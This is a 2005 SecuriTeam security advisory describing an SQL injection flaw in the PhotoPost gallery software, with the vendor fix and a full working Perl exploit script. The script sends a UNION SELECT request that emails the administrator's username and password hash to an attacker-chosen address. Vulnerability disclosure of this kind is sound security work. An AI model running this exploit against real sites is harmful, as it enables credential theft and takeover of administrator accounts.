[UNIX] PhotoPost Arbitrary Data (Exploit)

• Previous message: SecuriTeam: "[TOOL] MS SQL Server Passwords Bruteforce via SQL Injection (PoC)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 17 May 2005 10:41:44 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  PhotoPost Arbitrary Data (Exploit)
------------------------------------------------------------------------

SUMMARY

 <http://www.photopost.com/> PhotoPost is "a popular commercial image
publishing software. Everyone loves showing off their photos! Add
PhotoPost to your site, or let us install it for you,and your visitors
will be able to upload their photos to galleries on your site and interact
in photo discussions. Join the 3,500+ sites that are already using
PhotoPost and add a fun new dimension to your website". A vulnerability
caused by PhotoPost's reliance on magic_quotes allows a remote attacker to
cause the program to execute arbitrary SQL statements with which a user
can disclose the MD5 hash of the administrator password.

DETAILS

PhotoPost (further on - PP) is built on a highly risky principle of
filtering input data, based on magic_quotes:
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations. When
magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash)
and NUL's are escaped with a backslash automatically.

Turning magic_quotes on is neglected by a large percentage of PP users. It
is a good idea not to rely on user interaction in the essential matter of
data filtering and write nested procedures based on on the
mysql_escape_string/mysql_real_escape_string functions instead. Adding a
few native strings of code would have definitely fixed that "human"
factor. Many users do not have any idea what magic_quotes is and what it
is for and what their negligence will lead them to, even despite a warning
PP gives while installing. If one were to look into architecture PP is
assembled upon, it would become clear that PP should even not attempt to
install itself on systems with magic_quotes turned off.

Solution:
Vendor was contacted. Upgrade to the latest version, or set .htaccess
php_value magic_quotes_gpc 1

Exploit:
#!/usr/bin/perl
# PhotoPost Arbitrary Data Exploit
# --------------------------------
# INFPG - Hacking&Security Research
#
#
# Use first the exploit code,then You'll get admin MD5 hash and user name
on your mail.
#
# Greats: Infam0us Gr0up
team/crew/fans,Zone-H,securiteam,str0ke-milw0rm,addict3d,
# Thomas-secunia,Yudha,Dcrab's,Kavling Community,1st Indonesian Security,
# Jasakom,ECHO,etc..betst reagrds t0 whell.
# Info: www.98.to/infamous
#

use IO::Socket;

if (@ARGV < 3)
 {
system "clear";
print "PhotoPost Arbitrary Data Exploit\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";
print "[?]Usage: perl $0 [host] [path] [mail] \n";
exit(1);
}

system "clear";

$server = $ARGV[0];
$folder = @ARGV[1];
$mail = @ARGV[2];

print "Connecting to host ...\n";
$socket = IO::Socket::INET->new(
        Proto => "tcp",
        PeerAddr => "$ARGV[0]",
        PeerPort => "80"); unless ($socket)
{
  die "Server is offline\n"
}

print "[+]Connected\n\n";
print "[+]Building string core..\n";

$stringcore =
'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0", $mail,
%20concat(username,"%20",%20password)%20from%20users';

print "Sent 0day..\n\n";
print $socket "GET /$folder/$stringcore HTTP/1.0\r\n\r\n";
print "Server Exploited\n";
print "You should check $mail now";
close($socket);

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org> eric
basher.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] MS SQL Server Passwords Bruteforce via SQL Injection (PoC)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]